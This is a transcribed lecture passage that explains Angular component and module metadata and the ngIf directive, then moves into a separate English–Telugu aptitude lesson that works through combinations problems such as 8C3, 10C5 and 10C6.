component must contain the template. But how the connection happens between the component and template? Component is present in .ts file, template is present in .html file. How the connectivity happens? That's exactly by using template URL property. The template URL property specifies so and so this is a HTML file which is associated to this particular component. So we have to specify the name of the HTML file that contains the template. So the template will be connected or binded to the corresponding component. So let's check here. Here in our example we have something called login.component.html. This file name is mentioned here. But in order to represent the current working folder, we have to use /. / refers to the current working folder. And also we have something called style URLs. The meaning of style URLs specifies the CSS file names. Notice it can be one or more. So the third property is the style URLs.
it specifies the list of CSS files that are associated to the component. So while executing our components, what CSS files needs to be loaded, the list of CSS files can be mentioned in the style URLs property. Notice it is array type, so we can mention multiple CSS files. Usually in normal situations, one component will have only one CSS file, but in case if you require, you can write n number of CSS files. Multiple CSS files can be written. Generally one is enough for one component, and the file name also will be like the component name dot component dot CSS. For example, home dot component dot CSS. This is the naming convention for the CSS file name. So in the style URLs, in the square brackets, that means in the array brackets, we have to mention the name of the CSS file. So in our example, we have seen login.component.css. That means this login component is connected to this login.component.css and will be automatically loaded into the browser whenever we have invoked the login component. And next part is that animations. Animation, it specifies the list of animations that are to be loaded into the browser, into the component. So for your component, what animations needs to be occur, the list of animations can be mentioned here. These are the important metadata properties of your component. Next, let's discuss about the metadata of module. So just have a look at once. We have something called app.module.ts. So here is a module. The name of the module is app module. How do you say it's a module? There is a class. It is having a decorator called @ng module, means definitely the class is a module class, or simply it's a module. The word module class is not correct, so good word, it's a module. How do you create a module? Just make a class, because every module is a class. Above the class, we have to add @ng module. So basically, without all this additional information, it is look like this basically. But as I want to provide so many details about the particular module, we have to add this metadata. This metadata specifies what components are the members of this module, what services you want to import, what modules you want to import, and which component is a startup component. So let's understand the metadata properties of your module. So metadata of module. So basically, what is a module? Before than that, module is a group of components. So as you have a large application having several types of components, for example, registration form component, login form component, and check email component, compose email component, products search component, and order product component. We have 6 components. So all these components are not in the same category. I want to divide them into multiple groups. So there should be some tool or predefined mechanism in order to group them. The best way to group the components, that module. So we must place them inside any one module, but instead of placing all of them inside a single module, we have to divide them into multiple modules. Just like the globe is divided into multiple countries, we have a large application having so many components. We have to group up the components by using module. So a big application is a collection of modules. Modules are used to divide, group up the components. So here in our example, registration form component, login form component, both are present under one module. Maybe suitable name user account module. Check email and compose email, these two are related to mailing. So mailing module we have to create. Under the mailing module,
These two are the components. And the products search component and order the product. These two are the components that are members of the products module. Like that we can group up the components by using module. If you don't add the modules, what happens? The application may be cumbersome, confusing. So let's try to understand how to write the metadata of your module. In the metadata, we have to write the list of components that are members of the current working module. We are not going to talk about all the modules at the same time. At one moment, we can talk about only one module. So in this current working module, which are the members of the component? The component must be a member of any one module. The component can be maximum of member of only one module. The same component cannot be the member of multiple modules. The component must be a member of any one module. Then only it will execute. So first one is declarations. Declarations means list of components that you want to make them as a members of the module. So let's check it out. We have the first one, declarations. It specifies list of components that are members of the current module. So in this module, which are the members? These modules: app component, home component, about, contact, registration and login. And also right now I want to create one more module and I want to make the registration component and login component as a separate module, just for grouping purpose. In order to create a new module, go to your command prompt window, cd :angular 3pm app1 ngg. We are going to create a module called user account. Here ngg, ng means Angular, G for generate. What you are going to generate? Module you are going to generate. Name of the module is user account. User account will be actual name of the module. So as of now, two files we have got, that is user account module.ts and user account module.spec.ts. So in the user account module, we are able to create the necessary components. First, it has created a folder called user-account. In this user account module, in the folder, we have user account module.ts. Here first we have to import registration component from registration/registration.component.ts and login component from login/login.component. So in the declaration section, we have to specify the list of components that are members of the current module. In our example, it is registration form component and login form component. And also inside this registration and login, we are using the ng model, right? ng model must require forms module. So we have to import the forms module too. Then we have to remove the registration module and the login module in the app module. Now this registration and login are no longer the members of app module. So we can also remove them here. Okay, but now we are getting errors saying that login form or registration form are undefined. Because the reason, we have to export the registration and login components from this user account module, then only we can import them in the app module. Finally, we are invoking all the components in the app module. So we have to add one more option called exports. What components you want to export? Registration component and login component, both you want to export. So once we have mentioned these two, and also we have to import the user account module
in the app module. So in the import section we have to specify the name user account module. First we have to import user account module class from the so and so folder, and then we have to add the same to the import section of your app module. Then it is showing some error saying that my login is an Angular component, so my login is not imported. Let me import it here. Okay, let's check my login. Where is that my login? Yes, my login, and we are exporting here. Okay, and then we have to import it here. Yes, what's the problem? Let me check. My login, the error is my login is not a known element, it is saying. Okay, first we have to specify the declarations. That means what are the list of components that are members of the user account module must be mentioned here, and then we have to specify the same whichever you want to export to the other modules. We have to export the same. We are exporting registration form component and login form component. Both of these components we are exporting, and this user account module must be imported in the app module. First import the browser module, then we have to import user account module. Let me stop this application and rerun. We have given ngserve command again. It is just compiling this application and starting the application. By default, Angular live development server will be open, and it is going to be compiling and then running. Okay, now it is working. And another error is that if ng model is used within a form tag, either name attribute must be set or form control must be defined as standalone. So the reason for this error is we have to go to the login.component.html. There in the login.component.html, wherever we are giving ng model, there we have to add name. Once we have added the name, automatically that error is going to be clear. So now all the errors are clear. Now we are able to execute our application correctly. Okay, that's fine. So what you can understand from this module, a module consists of some metadata. First one is declarations. Declarations means a list of components that are members of the module. In the app module, these are the members: app component, home component, about component, contact component. In the user account module, these are the members: registration component and login component. The next one, exports. It specifies the list of components that you are exporting to other modules. Assume there are multiple modules. There is a module 1, module 2, for example. In the module 1, we have component 1 and component 2, and I want to use both of these components in component 3 and component 4 respectively. That means component 3 is willing to call component 1, component 4 is willing to call component 2. And this component 3 and 4 are the members of the module 2. So we have module 1 has component 1 and 2, module 2 has component 3 and 4, component 3 wants to call component 1, component 4 wants to call component 2. In this example, the module 1 wants to give or export or expose this component 1 and 2 to the other module, whereas module 2 is importing module 1 only.
So automatically it has rights to access the component 1 and 2 because component 1 and 2 already exported by the module 1. So I will give a simple real world illustration for this. So I am having 10 books and I want to give my 5 books to you. Here I am a module 1, you are module 2. I am having 10 books, that means in the declaration section 10 books are available. But only the first 5 books I want to export to you. You have to import me, that means that whichever I have exported, you will be able to use them. So, for example, I am willing to give book 1, book 1, 2, 3, 4, 5. So, these 5 books are accessible with you. First, you should subscribe to me, that means you should access me. Then, whatever I am providing, you will be able to access. So, the same exactly happening here. Module 1, module 2 imports module 1, that means whichever exported in the module 1 are by default imported into module 2. So, in our example, we are given the exports keyword, that means the list of components that you are exporting to other modules. What components will be available to other modules, the list can be mentioned in the exports. So, in the exports, we have to specify the list of components that you are exporting to other modules. So, for example, in our example, we are exporting registration component and login component from here to other modules. So, in any module, wherever we are importing user account module, there itself these 2 components are available or accessible there. So, imports, it specifies the list of modules that you are importing. It specifies the list of modules that you are importing. Which one you are importing, that list can be mentioned here. So, okay, so here we have just mentioned imports. We have imported the browser module, user account module, forms module, router module, browser animations module, all these modules we have imported. So, whichever the modules you want to import, we can mention here. Only modules, not components. Because once we have imported a module, what are the components already exported there, all of them will be imported indirectly. Directly we cannot import a component. We can import a module only, but in that module, whichever exported, those will be imported automatically in your module. The next part is Bootstrap. Here Bootstrap is not the library which what you have learned already. Here the Bootstrap means the startup module, startup component. It specifies the name of the component that you want to, startup component that you want to start executing automatically. So, some component should be the startup module, startup component. Among so many components, which should be the startup, that startup name can be mentioned here. So, by default, we have home component, about component, contact component and app component, which should be started by default app component. This is the total app component output only, right? Inside the app component, of course, we are invoking home, but overall this complete outline is presented by the app component. So, app component only the Bootstrap, and only one component can be the Bootstrap, cannot be multiple. So, we can specify only the single component name. We can specify only one component name as Bootstrap component. The next one, providers. It specifies the list of components
list of services that you are importing in the current module. So about the services we will discuss in detail later, but whenever we have imported a service, that service can be called in the any component of the current working module. In this module, for example, we have these components. In these components, you want to call some predefined or user defined services. The list of services must be imported, must be specified in the provider section. So these are the different properties of the module. So we have understood declarations. Declarations means what components are the members of the module. That a list of components are the declarations. Exports means the list of components that you are exporting. Imports means which modules you are importing. Bootstrap means a startup component. Providers means list of services. So far we have understood the list of or meaning of decorators. Now let us try to understand the meaning of something called directives. So the directives means the predefined classes that do some manipulation on the HTML elements. For example, I am going to use some HTML tag. For this HTML tag, I want to do some additional process. I want to apply some condition against it. I want to apply some looping for it. I want to write a switch case for it. So to apply some conditions for the particular HTML tag, we have to use the directives. So let us try to understand the predefined directives of Angular. So list of directives of Angular. ngIf, ngFor, ngClass. Okay, these are the three important directives of Angular: ngIf, ngClass, and ngFor. So let's try to understand each one. First one, mainly we'll focus on ngIf as of now. So what is ngIf? It is used to check a condition and display the HTML tag only if the condition is true. Whenever the condition is true, then only you would like to display the particular element, but particular HTML tag. Then we have to use ngIf. So in our example, so we have two messages. Okay, otherwise I will take some more other HTML tag. For example, home component will take. Okay, so here we have something called a property. For example, we have some student marks. Student marks is equal to 80. I want to check whether the student result is pass or fail. So the condition is student pass is going to be Boolean value. So I am going to check if student is pass, student marks is greater than or equal to 80, then this dot student pass is equal to true, otherwise this dot student pass equal to false. My goal is that if the student is pass, then only I would like to display some message for him. If the student is fail, I want to display other message. So in the home component, we are going to have a div tag. Okay, I am removing these many login forms. Here the requirement is I want to display the one message for student pass, other message for student fail. So I want to display student is pass, congratulations. I want to display this message only when the student pass is equal to true. So star ngIf is equal to student pass.
if the student is fail, I want to display the message better luck next time. The condition is true, this message will be appear. If the condition is false, this message will be appear. So presently condition is true, that's why it is going to show congratulations. If the condition is false, for example, I am going to make the marks as a 20 and the pass marks is 35. So presently the student is fail, so it is showing the message better luck next time. So this ngIf is meant for displaying the information conditionally. Okay, I will explain about this ng class and ng for later. So overall in the today's lesson we have understood decorators. The decorators are the special functions that apply some special behavior or special characteristics about the class, property or method. Metadata is the additional details about the decorator that can be written inside the decorator. Directives are the predefined classes that applies some condition or looping or switch case for the particular HTML tag. So we have discussed about ngIf only. We will discuss about the ng class and ng for in the further lessons. So that's all for today. We'll understand more about the ng class and ng for later. So thank you. Hello everyone, good afternoon. Welcome to Aptitude Foundation course presented by APSSTC. So we were discussing permutations and combinations in the earlier classes. If I'm right, this is going to be the third class, and in the first class we discussed, what are the counting principles, how it works, and how to solve the problems using basic principles of counting, correct? And in the second day we were discussing permutations, and today we are going to discuss combinations. So as I told you, this is a very huge topic which you need to understand so with more clarity. So I'm doing it in 3 sessions. Now when it comes to combinations, we need to understand what is meant by combinations. So first, combinations ante enti ani artham cheskovali. Now so first, principles ante enti ani chusam. Counting principles ela untundi, ela solve cheyali anedi manam chusam first day class lo, and second day permutations anedi chusam, basic questions and high level questions as well. And today the same thing, I'm going to start with the basic level combination questions, and at the same time I'm going to tell you, restricted. There are certain questions where you have to understand whether the particular question belongs to permutation or combination. Check chesi meer solve cheyalsina conditions kuda untundi. Conditional combination kuda manam ee roju check chustam. Alright, now what is the difference between a permutation and the combination? So in the second day's class I've already mentioned, when it comes to permutation, order matters a lot, correct? And when it comes to combination, it is just no order, it is just the selection. Let me differentiate once again. So when I say this is permutation, and let's talk about another thing, which is combination. So permutation and combination, correct? Permutation, combination. Let's say for example, once again let us understand, nenu malli permutation ki combination ki difference enti ante basic differences enti, ela differentiate cheyali anedi meeku okasari cheptunanu. See, let's say for example we have 3 variables A, B, C, correct? So we have 3 variables, and in order to make it easier, let's take alright, let's take 3 variables which are A, B, C. Now what is meant by permutation and what is meant by combination? Very simple. So we discussed permutation is nothing but the arrangement. Remember, permutation anedi it is considered as an arrangement. When it comes to combination, it is just a selection. Combination and it is just a selection. Remember, this is permutation means arrangement and combination ante selection. So arrangement ante enti, selection ante enti ante, it is so simple. For example, so A, B, C ani 3 elements unnai. Try to understand A, B, C ane 3 elements. So in such case, ee A, B, C lo nenu any 2 elements nenu teeskuntunnanu. Okay, any 2. So any 2 elements ని తీసుకొని నేను అరేంజ్ చేయాలంటే ఎలా చేయొచ్చు? ఫర్ ఎగ్జాంపుల్ నేను A, B అనే 2 elements తీసుకుంటున్నాను. Try to understand, out of this 3 I'm going to take only 2 elements which are A, B. When it comes to arrangement, it is so simple. So here permutations are always greater than combinations. Permutations are always greater than combinations. Now ఈ A, B ని నేను ఎలా అరేంజ్ చేయొచ్చు అంటే, first thing it is A, B, and second thing it is B, A.
So when it comes to arrangement, remember order you have to consider. When it comes to permutation or arrangement, order you have to consider, which is A comma B, which is nothing but B comma A. Correct. Now when it comes to selection, when it comes to selection, I mean combination. So E particular 3 elements lo I'm going to select 2 elements. Try to understand permutation lo man nenu em chesante I'm going to arrange 2 elements. So E A B ni nenu ela arrange cheyachante first E A and then B ga arrange cheyachu, or else first B and then A ga arrange cheyachu. Correct. Now when it comes to combination, so out of these 3 elements which are A, B, C, I'm going to select. So I'm going to select and it is going to be A comma B. That's it. See, I don't bother, I mean order doesn't matter here. It is so simple. So 3 members unnaru, or else 3 variables unnai A, B, C. Indulo nenu 2 variables ni select cheskuntunnanu ante I'm just going to select A and B. I'm not going to bother about how the way or in which order I'm going to choose or select this particular 2 elements. It is so simple. So మీరు చూసినట్లయితే 3 elements లో నేను ఎప్పుడైతే 2 elements తీసుకున్నానో నాకు ఎన్ని ఆర్డర్స్ వచ్చాయి A, B and B, A. సో ఇక్కడ 2 arrangements వచ్చాయి. Try to understand. ఈ 2 elements ని నేను అరేంజ్ చేసేటప్పుడు నాకు 2 arrangements వచ్చాయి. కరెక్ట్. నా when it comes to same A, B అనేది నేను సెలక్షన్ తీసుకున్నప్పుడు నాకు ఒక సెలక్షన్ మాత్రమే వచ్చింది. సో permutations are always greater than combinations, and we all know that permutation మనం ఏం చేస్తాం, సో it's represented in P, and obviously it is permutation is equal to n factorial by n minus r factorial అనే ఫార్ములాని యూస్ చేసి మనం డిపెండెన్సీ ఉంటుంది. n factorial by n minus r factorial permutation formula. Let's say if combination it is so simple, it is like n factorial by n minus r factorial into r factorial. We all know this, it's a very basic formula. Alright, now so ఇంతవరకు మనం చూస్ చేసుకున్న మనం సెలెక్ట్ చేసుకున్న, ఫర్ ఎగ్జాంపుల్ మనకి ఏదైతే క్వశ్చన్స్లో ఉన్న ఎలిమెంట్స్ కానీ నంబర్స్ కానీ ఆల్ఫాబెట్స్ కానీ ఏదైతే వాటిని మనం ఇంతసేపు అరేంజ్ చేసి అవి ఎన్ని వేస్లో మనం అరేంజ్ చేయొచ్చు అనేది సెలెక్ట్ చూస్తూ ఉన్నాం. బట్ నా టుడే వీఆర్ గోయింగ్ టు డిస్కస్ అబౌట్ ద కాంబినేషన్, వేరస్ వీఆర్ నాట్ గోయింగ్ టు బాదర్ అబౌట్ ఇట్స్ అరేంజ్మెంట్, వీఆర్ జస్ట్ గోయింగ్ టు సెలెక్ట్. We are just going to choose the elements. That's it. So forget about this permutation for some time. We are just going to concentrate only on the combinations. Combination enti just selection. Alright, so nenu cheppanu kada, I have 3 elements with me. It is so simple. I have 3 elements with me, which is nothing but A, B, C, and I'm going to select, or I'm going to choose only 2 elements which are nothing but A, B. Alright, in such case, in how many ways I can do that ante ఇట్స్ లైక్ AB అని మాత్రమే తీసుకున్నప్పుడు ఒకటి వస్తుంది. ఇప్పుడు C కూడా మీరు కన్సిడర్ చేసుకున్నట్లయితే లైక్ మల్టిపుల్స్ వస్తుంది. ఫర్ ఎగ్జాంపుల్, సో ABని కన్సిడర్ చేసుకున్నాను కాబట్టి నేను ఒక సెలక్షన్ అన్నాను, నేను C కూడా కన్సిడర్ చేసుకుంటే AB అని AC అని ఇలా మల్టిపుల్గా మారుతూ ఉంటుంది. కరెక్ట్. నౌ లెట్స్ సీ ద ఫస్ట్ క్వశ్చన్. If you see the first question here, it's going to be find the value of 8C3. Okay, I repeat, find the value of 8C3. So find the value of 8C3. So it's a combination, a basic question, whereas it's nothing but, so NCT, it's like NCR is equal to n factorial by n minus r factorial into r factorial. Correct. NCR, n factorial by n minus r factorial into r factorial. Same thing here. So it's going to be 8 factorial by 8 minus 3 whole factorial into 3 factorial. So whereas 8 factorial by 5 factorial into 3 factorial. Now, so factorial ante enti? It's like a descending order multiplication. Antena? So same here. Now 8 factorial ela raskochu descending order lo multiply chestu velali. Correct. So it is 8 into 7 into 6 into 5 factorial raskochu descending order multiplication. Correct. Now e 5 factorial ila note chestunanu, which is and 3 factorial. Now I can cancel this 5 factorial and here in the numerator. Now we are left with 8 into 7 into 6 by 3 factorial can be expanded, which is 3 into 2. Hence this is so simple. So once again 2 1s and 2 3s, 3 gets cancelled, which is 8 into 7, which is 56. So 8C3 is nothing but 56. I hope you understand this. I'll repeat this. 8C3, which is 8 factorial by, NCR is equal to n factorial by n minus r factorial into r factorial. So 8 factorial by 8 minus 3 factorial into 3 factorial. So which is 8 factorial by 5 factorial into 3 factorial by
8 into 7, in the next line if you see 8 into 7 into 6 into 5 factorial by 5 factorial into 3 factorial, whereas it is 8 into 7 into 6 by 3 into 2, which is 56. And I hope this is easy for you. Let's see the next question. If you observe the next question, it is like if 13cx, I repeat, if 13cx, alright, if 13cx is equal to 13cy, am I correct? If 13cx is equal to 13cy and x naught is equal to y, I repeat, if 13cx is equal to 13cy and x naught is equal to y, what is the value of x plus y? Okay, come again. So see this, 13cx is equal to 13cy. So x naught is equal to y అనేది condition. Now x plus y enta. It is so simple, and the combinations which you need to understand. Guys, 13cx is equal to 13cy అయితే మనకు 2 cases ఉండాలి. Okay, first case ఏంటి అంటే, so remember x is equal to y అన్న ఉండాలి. In the sense either x is equal to y or second ఏముండాలి అంటే, remember x plus y is equal to 13 అన్న అవ్వాలి. I repeat, so ఈ నెంబర్ ఏంటి, n ప్లేస్ లో ఏముంటుంది 13, కరెక్ట్. సో ఇక్కడ రెండు ఛాన్సెస్ మీకు ఉంటుంది. సో ఎప్పుడైతే 13cx is equal to 13cy ఉంటుందో మీకు రెండు ఛాన్సెస్ ఉంటుంది. ఒకటి చూసినట్లయితే x is equal to y, ఇంకోటి చూసినట్లయితే x plus y is equal to 13. ఇప్పుడు మనకు క్వశ్చన్లో క్లియర్గా ఏమి ఇచ్చారంటే x నాట్ is equal to y అనేది ఆల్రెడీ మెన్షన్ చేశారు, కరెక్ట్. ఎక్స్క్యూజ్ మీ, x నాట్ is equal to y అని ఇచ్చేసారు. ఇన్ ద సెన్స్ ఫస్ట్ ఆప్షన్ రావడానికి ఛాన్స్ లేదు. సో ఆబ్వియస్లీ యూ హ్యావ్ టు గో విత్ ద సెకండ్ ఆప్షన్ విచ్ ఇస్ x plus y is equal to 13. x plus y is equal to 13. So 13cx, if 13cx is equal to 13cy, then and at the same time x naught is equal to y, x plus y is equal to nth ante so simple. You have only two options, either x is equal to y ana undali or x plus y is equal to 13 ana undali. So x is equal to y not possible kabatti answer is x plus y is equal to 13. Let's see the next question. How many different committees of 5 members may be formed from 6 gentlemen and 4 ladies? I'll repeat the questions again. How many different committees of 5 members may be formed from 6 gentlemen and 4 ladies? Please make a note of this question. So these are the basic questions. How many different committees of 5 members may be formed, 6 gentlemen and 4 ladies? Alright, if you observe, so we have 6 gentlemen and 4 ladies. Correct, we have 6 gentlemen and 4 ladies. So how many different committees of 5 members? Now from this we are going to form a committee. We are going to form a committee, and this committee has how many members? So which has 5 members. Okay, so which has 5 members. I repeat the question. So you have 6 gentlemen and 4 ladies with you, and you have to form a committee of 5 members. In how many ways it can be formed? In how many ways it can be formed? It is so simple. If you observe this, so 5 members kavali ante, let's sum up this. So we have 6 gentlemen and 4 ladies kada. Do we have any subcondition, a condition or subcondition here? We don't have any condition. Ante conditions enti anedi meer check cheyali first. So if you ask me what are those conditions, it is so simple. So ee committee form, see 6 members, 6 male or 4 female icharu avuna. ఒక కమిటీ 5 మెంబర్స్ని ఫామ్ చేయండి ఇందులో నుండి చెప్పారు. ఫస్ట్ థింగ్ మీరు కండిషన్ చెక్ చేయాలి. కండిషన్ అంటే ఏంటంటే ఈ 5 మెంబర్స్లో ఫర్ ఎగ్జాంపుల్ పర్టికులర్గా ఇంతమంది లేడీస్, ఇంతమంది మేల్, ఇంతమంది ఫీమేల్ ఉండాలా అని ఏదైనా కండిషన్ ఉందా అని ఈ పర్టికులర్ క్వశ్చన్లో మీరు చెక్ చేసినట్లయితే వీ డోంట్ హ్యావ్ ఎనీ కండిషన్. ఇన్ ద సెన్స్ ఈ 5 మెంబర్స్ అందరూ మేల్ అవ్వచ్చు, లేదంటే దాంట్లో 4 ఫీమేల్స్ ఉండొచ్చు, లేదా ఎనీ కాంబినేషన్, వీ డోంట్ హ్యావ్ ఎనీ రిస్ట్రిక్షన్. హౌ ఎవర్ ద వే యూ వాంట్ యూ కెన్ ఫార్మ్. ఇన్ ద సెన్స్ మనకు ఎక్స్క్లూజివ్గా 2 members లేడీస్ ఉండాలి, 3 members లేడీస్ ఉండాలి, లేదు 4 members జెంట్స్ ఉండాలి, లేదు 2 members జెంట్స్ ఉండాలి, ఇలాంటి కండిషన్స్ ఎనీ లేని క్వశ్చన్. ఇన్ సచ్ కేస్ సో ఈ 6 జెంటిల్మెన్ని 4 లేడీస్ని నేను చేస్తున్నా అంటే టోటల్గా 10 members ఉన్నారు అని కన్సిడర్ చేసుకుంటున్నా.
10 మెంబర్స్ ఉన్నారు. ఎందుకంటే నేను సెలెక్ట్ చేయడంలో వీ డోంట్ హ్యావ్ ఎనీ జెండర్ డిస్క్రిమినేషన్ వెన్ ఇట్ కమ్స్ టు కమిటీ. నేను కమిటీ ఫామ్ చేసేటప్పుడు నాకు ఎటువంటి కండిషన్ లేదు. ఫర్ ఎగ్జాంపుల్ ఇది మీకు ఇంకా సింపుల్గా అర్థం కావాలి అంటే లెట్స్ సే మీ క్లాస్లో 6 బాయ్స్ అండ్ 4 గర్ల్స్ ఉన్నారని తీసుకోండి. ఇంకా ఈజీగా అర్థమవుతుంది. 6 బాయ్స్ అండ్ 4 గర్ల్స్ ఒక టీమ్ని ఫామ్ చేయాలి. సో ఆ టీంలో ఎంతమంది ఉండాలంటే 5 మెంబర్స్ ఉండాలి. సో వీ డోంట్ హ్యావ్ ఎనీ కండిషన్ ఇన్ ద సెన్స్ మనకి దీంట్లో ఇంతమంది బాయ్స్ ఉండాలి, ఇంతమంది గర్ల్స్ ఉండాలి, ఇలాంటి ఎక్స్క్లూజివ్ కండిషన్ ఏం లేదు. సింపుల్గా 5 మెంబర్స్ ఉన్న ఒక టీమ్ని ఫామ్ చేయండి అని చెప్పారు. అప్పుడు నేను ఏం చేస్తానంటే ఈ 6 బాయ్స్ 4 గర్ల్స్ అంటే విచ్ ఇస్ నథింగ్ బట్ 6 జెంటిల్మెన్ 4 లేడీస్ని కలిపి నేను 10 మెంబర్స్ ఉన్నారు అని చెప్పి కన్సిడర్ చేసుకుంటున్నాను ఓవరాల్గా. సో ఈ 10 మెంబర్స్ నుండి ఎంతమందిని సెలెక్ట్ చేయాలి? ఐ మీన్ 5 మెంబర్స్ ఉన్న టీమ్ని సెలెక్ట్ చేయాలి. ఎన్ని వేస్లో అంటే ఇట్ ఇస్ సో సింపుల్. ఇట్స్ గోయింగ్ టు బి 10C5. దట్స్ ఇట్. ఇట్స్ గోయింగ్ టు బి 10C5. ఆల్రైట్. సో ఎగ్జామ్లో ఎలా రావచ్చు? టెస్ట్లో మీకు 10C5 అని ఇచ్చినా ఓకే, ఇట్స్ వెల్ అండ్ గుడ్. లేదు దీన్ని సాల్వ్ చేసి ఆన్సర్ తీసుకురావాలన్నా ఓకే, బట్ యూ హ్యావ్ టు గో త్రూ ద ఆప్షన్స్. సమ్ టైమ్స్ దీన్ని సాల్వ్ చేయకుండా 10C5 అలానే ఆన్సర్స్ ఇవ్వచ్చు. కొన్నిసార్లు దీన్ని సాల్వ్ చేసి నంబర్స్లోనే ఆన్సర్స్ ఇవ్వచ్చు. ఇట్ ఈస్ బెటర్ ఇఫ్ యూ సాల్వ్ దిస్ యాజ్ వెల్. సో ఇట్స్ లైక్ 10 factorial by 10C5 is nothing but 10 factorial by 10 minus 5 factorial into 5 factorial. Alright. Now it is going to be 10 factorial ఎలా రాసుకోవచ్చు? 10 factorial by, so once again 5 factorial into 5 factorial. Correct. Now so it's going to be, so నేను 10 factorial ఎలా రాసుకోవచ్చు? Descending order multiplication కదా, which is nothing but 10 into 9 into, and this is 8 into 7 into 6 into 5 factorial అని నోట్ చేసుకొని, అండ్ ఈ 5 factorial అలానే నోట్ చేసుకుంటున్నాను, అండ్ దిస్ ఇస్ గోయింగ్ టు బి 5 factorial. సో ఒక 5 factorial ఈ 5 factorial క్యాన్సిల్ చేస్తే ఇంకా వీఆర్ లెఫ్ట్ విత్ 10 into 9 into 8 into 7 into 6 by 5 factorial. So ఈ 5 factorial cancel కాబట్టి we are left with only 5 factorial, which can be written as 5 into 4 into 3 into 2 into 1. And now 5 2's 10, correct? Cancel. Now 3 ones 3 3's and 4 ones 4 twice. So we are left with 3 into 2 into 7 into 6, which means 6 into 7 into 6, which means 42, 6 7 6 42 into 6. So 42 into 6 మీరు చూసినట్లయితే it is so simple. 6 2s are 12 and 6 4s are 24, which is 252. So 252 ways లో మనం we can form a committee, which means ఈ 6 gentlemen and 4 ladies ని యూజ్ చేసి మనం ఒక 5 మెంబర్స్ ఉన్న ఒక టీమ్ని, ఒక కమిటీని మనం ఫామ్ చేయాలి అంటే ఎనీ డిఫరెంట్ వేస్లో చేయొచ్చు. ఇట్ ఈస్ సో సింపుల్, విచ్ ఇస్ 252 ways. లెట్స్ సీ ద నెక్స్ట్ క్వశ్చన్. If you observe, in a test paper there are 10 questions, totally 10 questions. In how many different ways you can choose 6 questions to answer? Alright, we have a question paper where you have 10 questions in it and you're going to choose only 6 questions to answer. You're not going to answer all the 10 questions. Okay, no need to understand what is the reason behind that. Just try to get the answer. It is so simple. 10 questions మీ దగ్గర ఉన్నాయి, అందులో మీరు 6 questions మాత్రమే ఆన్సర్ చేయబోతున్నారు. సో ఇది టెక్నికల్గా ఏంటి అనేది ఒక్కసారి మీరు అండర్స్టాండ్ చేసుకొని కాంబినేషన్స్ చేయడం బెటర్. సో ఐమ్ జస్ట్ గోయింగ్ టు ఎక్స్ప్లెయిన్. డోంట్ డూ ఆల్ దీస్ థింగ్స్ ఇన్ ఎగ్జామినేషన్. ఇది మీ అండర్స్టాండింగ్కి మాత్రమే. లెట్స్ సే 1 2 3 4 5 6 7 8 9 10. So I have 10 questions. So question number 1 from question number 10. Now I'm going to choose only 6 questions to answer. I'm not going to, let's say idoka black box anukunte deentlo 1 2 3 4 5 6 ee 10 lo nenu 6 questions maatrame choose chesukuntunna. Now I can choose question number 1 to answer. Let's say I don't want question 2. Let's say question 3 answer chesna. Let's say I want question 4. Yes, question 4, and I'm going to answer question 5 as well. Question 5. Alright, I'm not going to answer question 6. I'm going to answer question 7. Okay, question 7. And I'm not answering 8. I'm not answering 9. I'm answering question 10. ఓకే, సో ర్యాండమ్గా నేను ఇక్కడ మీకు ఏం చేశానంటే 10 క్వశ్చన్స్ తీసుకొని దాంట్లో ఈ 6 క్వశ్చన్స్ మాత్రమే నేను ఆన్సర్ చేశానని చెప్పి. ఇది ఇస్ జస్ట్ అ ర్యాండమ్.
ఓకే నేను ఒక ర్యాండమ్గా ఇలా నేను ఈ 6 క్వశ్చన్స్ని ఆన్సర్ చేస్తాను చెప్పాను కదా. సో ఇన్ సచ్ కేస్ ఈ 10 క్వశ్చన్స్ ఉంటే దీంట్లో 6 మాత్రమే నేను ఆన్సర్ చేయాలనుకున్నప్పుడు ఇలాంటి ఎన్ని డిఫరెంట్ వేస్లో నేను ఆన్సర్ చేయొచ్చు అనేది ఇక్కడ క్వశ్చన్. బట్ మేక్ ష్యూర్ వీఆర్ నాట్ గోయింగ్ టు ఫాలో ఎనీ పర్టికులర్ ఆర్డర్. దిస్ క్వశ్చన్ డజంట్ కమ్ అండర్ permutations. This is completely combinations. So in how many ways I'm going to select? Alright, I'm not going to arrange. It is so simple. See here it is like we have 10 questions and probably we are going to answer only 6 questions. So obviously it is 10 C 6. If you ask me how it works, it is so simple. So 10 factorial by 10 minus 6 factorial by 10 minus 6 factorial into 6 factorial, which means 10 factorial by 4 factorial into 6 factorial. Now which means 10 into descending order multiplication, 10 into and 8 into 7 into 6 into 5 into let's say I'm going to stop with 6 just because we have 6 factorial and 4 factorial into 6 factorial. Now it is so simple, 6 factorial and 6 factorial I'm going to cancel and we are left with 10 into 9 into 8 into 7 by 4 into 3 into 2. Okay, now so 4 2 8, correct, 4 2s are 8 obviously and 3 1s 3 3s. So we are left with 10 into 3 into 7, which means 30 into 7, which means 210. 210. So in the sense, so this can be done in 210 different ways. 210 different ways. So ilanti any different combinations nenu choose chesukochu ante question 1, question 2, question 3, let's say question 4, 5 ilanti any different combinations anedi nenu cheyochu ante 210 different ways lo I can select all these 10 questions. Now let's see the next question. Okay, Mr. Ram has 5 friends. Okay, this is very important question which you need to understand. Mr. Ram has 5 questions. In how many ways he can invite one or more of them to a dinner? I repeat, so Mr. Ram has 5 friends. So he has 5 friends. Okay, so in such case, Mr. Ram has 5 friends. In such case, so he is going to invite them for a dinner. So let's say he is going to arrange a party or a dinner kind of thing. Now for that he has to invite his friends to his home. So intiki pilustunnadu tana friends ni, correct? So 5 members unnaru, any different ways lo tanu pilavachu ani cheppi. Now let's say Ram has 5 friends, first, second, third, fourth, 5. Alright, now what are these ante try to understand. So Ram ki any friends meer chusnataithe Ram has 5 friends. Okay, now what are the chances anedi meer chusnataithe ikkada. So in how many ways he can invite one or more of them to the dinner? So simple, in the sense he can invite only one friend, not first friend. This is not the order. We are not considered about, we are not bothered about the order here. No need to bother. This is the count. Okay, total count. Let's say రామ్ అనే తనకి 5 ఫ్రెండ్స్ ఉన్నారు అంటే తను ఒక్కరిని మాత్రమే పిలవడానికి ఛాన్స్ ఉంది, విచ్ ఇస్ ఓన్లీ 1 పర్సన్. టోటల్ కౌంట్ ఓన్లీ ఒకరిని మాత్రమే. సో ఇన్ సచ్ కేస్ ఇట్స్ గోయింగ్ టు బి 5C1. 5 మెంబర్స్ ఫ్రెండ్స్లో తను ఒకరిని మాత్రమే సెలెక్ట్ చేసుకుంటున్నాడు. ఆల్రైట్, లెట్స్ సే ఆర్ he can invite 2 people, any 2, he can invite any 2 people, or he can invite any 3 people, correct? Now he 